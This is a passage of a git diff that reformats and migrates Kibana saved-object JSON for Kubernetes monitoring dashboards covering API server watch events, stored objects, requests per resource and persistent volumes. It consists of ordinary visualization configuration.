"index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8df21ece-205d-4542-bec9-e381eca92895": { - "columnOrder": [ - "cff4229b-4050-47ef-bb61-9790c5596064", - "42b0785e-95e8-4538-8cc5-b1771f663c0c", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2" - ], - "columns": { - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Watch Events Size in Bytes", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "max(kubernetes.apiserver.watch.events.size.bytes.sum)/max(kubernetes.apiserver.watch.events.size.bytes.count)", - "isFormulaBroken": false - }, - "references": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2" - ], - "scale": "ratio" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Watch Events Size in Bytes", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.watch.events.size.bytes.sum" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Watch Events Size in Bytes", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.watch.events.size.bytes.count" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Watch Events Size in Bytes", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" - ], - "location": { - "max": 109, - "min": 0 - 
}, - "name": "divide", - "text": "max(kubernetes.apiserver.watch.events.size.bytes.sum)/max(kubernetes.apiserver.watch.events.size.bytes.count)", - "type": "function" - } - }, - "references": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" - ], - "scale": "ratio" - }, - "42b0785e-95e8-4538-8cc5-b1771f663c0c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 50 values of kubernetes.apiserver.watch.events.kind", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 50 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.watch.events.kind" - }, - "cff4229b-4050-47ef-bb61-9790c5596064": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1" - ], - "layerId": "8df21ece-205d-4542-bec9-e381eca92895", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "42b0785e-95e8-4538-8cc5-b1771f663c0c", - "xAccessor": "cff4229b-4050-47ef-bb61-9790c5596064" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": 
"area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 21, - "i": "97d844d4-e990-444a-8b94-34aa4dcd64cc", - "w": 24, - "x": 24, - "y": 5 + "layers": [ + { + "accessors": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1" + ], + "layerId": "8df21ece-205d-4542-bec9-e381eca92895", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "42b0785e-95e8-4538-8cc5-b1771f663c0c", + "xAccessor": "cff4229b-4050-47ef-bb61-9790c5596064" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "97d844d4-e990-444a-8b94-34aa4dcd64cc", - "title": "Apiserver Watch Events Size per Kind [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-aba71622-b1dc-4b3c-b7c0-c9212af90472", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "aba71622-b1dc-4b3c-b7c0-c9212af90472": { - "columnOrder": [ - "f66894ae-0dbb-4132-838b-04725a5ae7bf", - "cad0c9f5-09c6-405b-8801-5177891c830a" - ], - "columns": { - "cad0c9f5-09c6-405b-8801-5177891c830a": { - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.apiserver.etcd.object.count: *" - }, - "isBucketed": false, - "label": "Last value of kubernetes.apiserver.etcd.object.count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - 
"scale": "ratio", - "sourceField": "kubernetes.apiserver.etcd.object.count" - }, - "f66894ae-0dbb-4132-838b-04725a5ae7bf": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.apiserver.request.resource", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "cad0c9f5-09c6-405b-8801-5177891c830a", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.request.resource" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Apiserver Requests Rate per Resource [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 21, + "i": "97d844d4-e990-444a-8b94-34aa4dcd64cc", + "w": 24, + "x": 24, + "y": 5 + }, + "panelIndex": "97d844d4-e990-444a-8b94-34aa4dcd64cc", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8df21ece-205d-4542-bec9-e381eca92895": { + "columnOrder": [ + "cff4229b-4050-47ef-bb61-9790c5596064", + "42b0785e-95e8-4538-8cc5-b1771f663c0c", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2" + ], + "columns": { + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Watch Events Size in Bytes", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + 
"params": { + "decimals": 2 + } }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "layerId": "aba71622-b1dc-4b3c-b7c0-c9212af90472", - "layerType": "data", - "legendDisplay": "default", - "metrics": [ - "cad0c9f5-09c6-405b-8801-5177891c830a" - ], - "nestedLegend": false, - "numberDisplay": "value", - "primaryGroups": [ - "f66894ae-0dbb-4132-838b-04725a5ae7bf" - ] - } - ], - "shape": "pie" - } + "formula": "max(kubernetes.apiserver.watch.events.size.bytes.sum)/max(kubernetes.apiserver.watch.events.size.bytes.count)", + "isFormulaBroken": false + }, + "references": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 23, - "i": "481678b8-e443-4433-ad15-b55eaab7c8f4", - "w": 24, - "x": 24, - "y": 26 - }, - "panelIndex": "481678b8-e443-4433-ad15-b55eaab7c8f4", - "title": "Apiserver Stored Objects per Resource [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-fc6561f2-f85f-4096-86df-ef5dcb95627c", - "type": "index-pattern" + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Watch Events Size in Bytes", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.watch.events.size.bytes.sum" + }, + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Watch Events Size in Bytes", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.watch.events.size.bytes.count" + }, + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2": { + "customLabel": true, + 
"dataType": "number", + "isBucketed": false, + "label": "Part of Watch Events Size in Bytes", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" + ], + "location": { + "max": 109, + "min": 0 + }, + "name": "divide", + "text": "max(kubernetes.apiserver.watch.events.size.bytes.sum)/max(kubernetes.apiserver.watch.events.size.bytes.count)", + "type": "function" } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "fc6561f2-f85f-4096-86df-ef5dcb95627c": { - "columnOrder": [ - "2a873e10-31f0-4b48-abc0-5c2c0efa8aed", - "a5d3264f-b070-4a5e-a62c-659c410e9a64", - "414b7d77-a53c-4043-9690-4e3b000980be" - ], - "columns": { - "2a873e10-31f0-4b48-abc0-5c2c0efa8aed": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of kubernetes.apiserver.request.subresource", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "414b7d77-a53c-4043-9690-4e3b000980be", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.request.subresource" - }, - "414b7d77-a53c-4043-9690-4e3b000980be": { - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.apiserver.request.count: *" - }, - "isBucketed": false, - "label": "Last value of kubernetes.apiserver.request.count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.request.count" - }, - "a5d3264f-b070-4a5e-a62c-659c410e9a64": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.apiserver.request.resource", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "414b7d77-a53c-4043-9690-4e3b000980be", - "type": "column" - }, - 
"orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.request.resource" - } - }, - "incompleteColumns": {} - } - } - } + }, + "references": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" + ], + "scale": "ratio" + }, + "42b0785e-95e8-4538-8cc5-b1771f663c0c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 50 values of kubernetes.apiserver.watch.events.kind", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "layerId": "fc6561f2-f85f-4096-86df-ef5dcb95627c", - "layerType": "data", - "legendDisplay": "default", - "metrics": [ - "414b7d77-a53c-4043-9690-4e3b000980be" - ], - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "2a873e10-31f0-4b48-abc0-5c2c0efa8aed", - "a5d3264f-b070-4a5e-a62c-659c410e9a64" - ] - } - ], - "shape": "treemap" - } + "size": 50 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.watch.events.kind" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false + "cff4229b-4050-47ef-bb61-9790c5596064": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + 
"yLeft": true, + "yRight": true }, - "gridData": { - "h": 23, - "i": "9f255e7f-b213-4719-9c00-eedc2a919e2c", - "w": 24, - "x": 0, - "y": 26 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "9f255e7f-b213-4719-9c00-eedc2a919e2c", - "title": "Apiserver Requests per Resource and SubResource [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] API server", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-05-11T17:40:45.917Z", - "id": "kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1" + ], + "layerId": "8df21ece-205d-4542-bec9-e381eca92895", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "42b0785e-95e8-4538-8cc5-b1771f663c0c", + "xAccessor": "cff4229b-4050-47ef-bb61-9790c5596064" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "9db496f9-079b-4ddd-b517-cec815a7e9cb:indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", - "type": "index-pattern" + "title": "Apiserver Watch Events Size per Kind [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 
23, + "i": "481678b8-e443-4433-ad15-b55eaab7c8f4", + "w": 24, + "x": 24, + "y": 26 }, - { - "id": "metrics-*", - "name": "97d844d4-e990-444a-8b94-34aa4dcd64cc:indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", - "type": "index-pattern" + "panelIndex": "481678b8-e443-4433-ad15-b55eaab7c8f4", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-aba71622-b1dc-4b3c-b7c0-c9212af90472", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "aba71622-b1dc-4b3c-b7c0-c9212af90472": { + "columnOrder": [ + "f66894ae-0dbb-4132-838b-04725a5ae7bf", + "cad0c9f5-09c6-405b-8801-5177891c830a" + ], + "columns": { + "cad0c9f5-09c6-405b-8801-5177891c830a": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.apiserver.etcd.object.count: *" + }, + "isBucketed": false, + "label": "Last value of kubernetes.apiserver.etcd.object.count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.etcd.object.count" + }, + "f66894ae-0dbb-4132-838b-04725a5ae7bf": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.apiserver.request.resource", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "cad0c9f5-09c6-405b-8801-5177891c830a", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.request.resource" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "aba71622-b1dc-4b3c-b7c0-c9212af90472", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + 
"cad0c9f5-09c6-405b-8801-5177891c830a" + ], + "nestedLegend": false, + "numberDisplay": "value", + "primaryGroups": [ + "f66894ae-0dbb-4132-838b-04725a5ae7bf" + ] + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "481678b8-e443-4433-ad15-b55eaab7c8f4:indexpattern-datasource-layer-aba71622-b1dc-4b3c-b7c0-c9212af90472", - "type": "index-pattern" + "title": "Apiserver Stored Objects per Resource [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 23, + "i": "9f255e7f-b213-4719-9c00-eedc2a919e2c", + "w": 24, + "x": 0, + "y": 26 }, - { - "id": "metrics-*", - "name": "9f255e7f-b213-4719-9c00-eedc2a919e2c:indexpattern-datasource-layer-fc6561f2-f85f-4096-86df-ef5dcb95627c", - "type": "index-pattern" - } + "panelIndex": "9f255e7f-b213-4719-9c00-eedc2a919e2c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-fc6561f2-f85f-4096-86df-ef5dcb95627c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "fc6561f2-f85f-4096-86df-ef5dcb95627c": { + "columnOrder": [ + "2a873e10-31f0-4b48-abc0-5c2c0efa8aed", + "a5d3264f-b070-4a5e-a62c-659c410e9a64", + "414b7d77-a53c-4043-9690-4e3b000980be" + ], + "columns": { + "2a873e10-31f0-4b48-abc0-5c2c0efa8aed": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of kubernetes.apiserver.request.subresource", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "414b7d77-a53c-4043-9690-4e3b000980be", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.request.subresource" + }, + "414b7d77-a53c-4043-9690-4e3b000980be": 
{ + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.apiserver.request.count: *" + }, + "isBucketed": false, + "label": "Last value of kubernetes.apiserver.request.count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.request.count" + }, + "a5d3264f-b070-4a5e-a62c-659c410e9a64": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.apiserver.request.resource", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "414b7d77-a53c-4043-9690-4e3b000980be", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.request.resource" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "fc6561f2-f85f-4096-86df-ef5dcb95627c", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "414b7d77-a53c-4043-9690-4e3b000980be" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "2a873e10-31f0-4b48-abc0-5c2c0efa8aed", + "a5d3264f-b070-4a5e-a62c-659c410e9a64" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Apiserver Requests per Resource and SubResource [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] API server", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"9db496f9-079b-4ddd-b517-cec815a7e9cb:indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "97d844d4-e990-444a-8b94-34aa4dcd64cc:indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "481678b8-e443-4433-ad15-b55eaab7c8f4:indexpattern-datasource-layer-aba71622-b1dc-4b3c-b7c0-c9212af90472", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9f255e7f-b213-4719-9c00-eedc2a919e2c:indexpattern-datasource-layer-fc6561f2-f85f-4096-86df-ef5dcb95627c", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013.json index a3b2c7ae750..1093b0d5930 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013.json 
@@ -1,534 +1,544 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e\",\"enhancements\":{}}},\"24514d41-0fa1-4fc5-96a1-6297453134bd\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.persistentvolume.name\",\"title\":\"Persistent Volume Name\",\"id\":\"24514d41-0fa1-4fc5-96a1-6297453134bd\",\"selectedOptions\":[],\"enhancements\":{}}},\"16f1ca8d-0221-4df5-ae59-42a0e0f92992\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.persistentvolumeclaim.name\",\"title\":\"Persistent Volume Claim Name\",\"id\":\"16f1ca8d-0221-4df5-ae59-42a0e0f92992\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1NCwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster 
Name\",\"id\":\"4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e\",\"enhancements\":{}}},\"24514d41-0fa1-4fc5-96a1-6297453134bd\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.persistentvolume.name\",\"title\":\"Persistent Volume Name\",\"id\":\"24514d41-0fa1-4fc5-96a1-6297453134bd\",\"selectedOptions\":[],\"enhancements\":{}}},\"16f1ca8d-0221-4df5-ae59-42a0e0f92992\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.persistentvolumeclaim.name\",\"title\":\"Persistent Volume Claim Name\",\"id\":\"16f1ca8d-0221-4df5-ae59-42a0e0f92992\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about Persistent Volumes and Persistent Volume Claims", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "14993ee2-7277-4012-946c-fa294f024a39", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Persistent Volumes and Persistent Volume Claims", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "14993ee2-7277-4012-946c-fa294f024a39", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes 
Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "e6032561-b325-41fe-b7f5-6b167d58dc18", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "e6032561-b325-41fe-b7f5-6b167d58dc18", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e8ede311-8955-4a16-bf44-8c0ff0e0104b": { + "columnOrder": [ + 